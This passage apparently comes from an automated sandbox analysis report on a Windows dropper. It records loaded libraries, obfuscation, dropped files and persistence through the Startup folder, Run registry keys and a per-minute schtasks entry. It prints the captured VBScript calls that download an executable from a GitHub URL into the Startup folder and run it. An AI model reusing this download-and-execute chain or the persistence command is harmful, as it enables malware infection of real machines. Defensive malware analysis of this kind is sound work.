                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                              Source: WLJOQW.lnk.7.drLNK file: ..\..\..\..\..\Windata\DELPQB.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\oJIRyvL.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                              Data Obfuscation

                              barindex
                              VBScript performs obfuscated calls to suspicious functions
                              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe")
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00EC30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00EC30B0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F6020C pushfd ; retf 7_2_00F60215
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7C6CC push esi; ret 7_2_00F7C6CE
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3CB5D push edi; ret 7_2_00F3CB5F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3CC76 push esi; ret 7_2_00F3CC78
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3CE51 push esi; ret 7_2_00F3CE53
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3CF3A push edi; ret 7_2_00F3CF3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F37795 push ecx; ret 7_2_00F377A8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5BB9D push FFFFFF8Bh; iretd 7_2_00F5BB9F
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 10_2_066188F2 push es; retf 10_2_06618900
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 10_2_0698FCF2 push es; retf 10_2_0698FD00
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB020C pushfd ; retf 16_2_00DB0215
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCC6CC push esi; ret 16_2_00DCC6CE
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8CB5D push edi; ret 16_2_00D8CB5F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8CC76 push esi; ret 16_2_00D8CC78
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8CE51 push esi; ret 16_2_00D8CE53
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D8CF3A push edi; ret 16_2_00D8CF3C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D87795 push ecx; ret 16_2_00D877A8
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DABB9D push FFFFFF8Bh; iretd 16_2_00DABB9F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F6020C pushfd ; retf 23_2_00F60215
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7C6CC push esi; ret 23_2_00F7C6CE
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3CB5D push edi; ret 23_2_00F3CB5F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3CC76 push esi; ret 23_2_00F3CC78
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3CE51 push esi; ret 23_2_00F3CE53
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F3CF3A push edi; ret 23_2_00F3CF3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F37795 push ecx; ret 23_2_00F377A8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5BB9D push FFFFFF8Bh; iretd 23_2_00F5BB9F
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Jump to dropped file
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCX8AC4.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJump to dropped file
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Jump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCX8AC4.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Drops PE files to the startup folder
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnkJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQWJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQWJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_00F2F78E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F77F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00F77F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00D7F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DC7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00DC7F0E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_00F2F78E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F77F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_00F77F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D81E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00D81E5A
                              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
